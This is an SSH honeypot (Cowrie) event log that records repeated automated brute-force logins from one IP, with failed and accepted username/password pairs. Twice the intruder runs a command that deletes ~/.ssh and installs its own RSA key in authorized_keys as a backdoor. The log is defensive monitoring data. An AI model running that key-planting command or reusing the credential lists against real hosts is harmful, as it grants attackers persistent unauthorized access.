{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:23:37.423843Z","src_ip":"212.227.235.229","session":"0a12957ae1f1"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:23:38.506970Z","src_ip":"212.227.235.229","session":"0a12957ae1f1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:23:39.770418Z","src_ip":"212.227.235.229","session":"0a12957ae1f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43715,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b865560d813","protocol":"ssh","message":"New connection: 212.227.235.229:43715 (1.2.3.4:22) [session: 7b865560d813]","sensor":"my-vps","timestamp":"2025-09-09T01:23:45.430727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:23:45.431714Z","src_ip":"212.227.235.229","session":"7b865560d813"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:23:45.655382Z","src_ip":"212.227.235.229","session":"7b865560d813"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:23:46.591983Z","src_ip":"212.227.235.229","session":"7b865560d813"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:23:47.819488Z","src_ip":"212.227.235.229","session":"7b865560d813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38410,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b9bcd63fb3c","protocol":"ssh","message":"New connection: 212.227.235.229:38410 (1.2.3.4:22) [session: 2b9bcd63fb3c]","sensor":"my-vps","timestamp":"2025-09-09T01:24:34.497984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:34.498915Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:34.661532Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty22","message":"login attempt [root/qwerty22] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:24:35.356133Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:24:35.730489Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:24:35.731337Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:24:35.732471Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:35.895081Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:24:36.275469Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.276271Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.440029Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.441014Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38418,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90cbcefda55","protocol":"ssh","message":"New connection: 212.227.235.229:38418 (1.2.3.4:22) [session: a90cbcefda55]","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.600412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.601440Z","src_ip":"212.227.235.229","session":"a90cbcefda55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:36.766366Z","src_ip":"212.227.235.229","session":"a90cbcefda55"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:24:37.465842Z","src_ip":"212.227.235.229","session":"a90cbcefda55"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:38.635158Z","src_ip":"212.227.235.229","session":"a90cbcefda55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38432,"dst_ip":"1.2.3.4","dst_port":22,"session":"22f89d00cad5","protocol":"ssh","message":"New connection: 212.227.235.229:38432 (1.2.3.4:22) [session: 22f89d00cad5]","sensor":"my-vps","timestamp":"2025-09-09T01:24:38.799891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:38.800830Z","src_ip":"212.227.235.229","session":"22f89d00cad5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:38.967519Z","src_ip":"212.227.235.229","session":"22f89d00cad5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:24:39.668475Z","src_ip":"212.227.235.229","session":"22f89d00cad5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:39.834256Z","src_ip":"212.227.235.229","session":"22f89d00cad5"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:39.841578Z","src_ip":"212.227.235.229","session":"2b9bcd63fb3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58730,"dst_ip":"1.2.3.4","dst_port":22,"session":"759f6b1a0a7a","protocol":"ssh","message":"New connection: 212.227.235.229:58730 (1.2.3.4:22) [session: 759f6b1a0a7a]","sensor":"my-vps","timestamp":"2025-09-09T01:24:48.728475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:48.729654Z","src_ip":"212.227.235.229","session":"759f6b1a0a7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:48.963272Z","src_ip":"212.227.235.229","session":"759f6b1a0a7a"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:24:49.944525Z","src_ip":"212.227.235.229","session":"759f6b1a0a7a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:51.179892Z","src_ip":"212.227.235.229","session":"759f6b1a0a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36054,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e6692561b2","protocol":"ssh","message":"New connection: 212.227.235.229:36054 (1.2.3.4:22) [session: 65e6692561b2]","sensor":"my-vps","timestamp":"2025-09-09T01:24:54.897620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:54.898286Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:55.139414Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer741","message":"login attempt [root/qwer741] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:24:56.147097Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:24:56.654388Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:24:56.655322Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:24:56.656500Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:56.899320Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:24:57.484834Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:24:57.485508Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:24:57.728986Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:24:57.730106Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36746,"dst_ip":"1.2.3.4","dst_port":22,"session":"aabfc0883bf9","protocol":"ssh","message":"New connection: 212.227.235.229:36746 (1.2.3.4:22) [session: aabfc0883bf9]","sensor":"my-vps","timestamp":"2025-09-09T01:24:57.977811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:24:57.978611Z","src_ip":"212.227.235.229","session":"aabfc0883bf9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-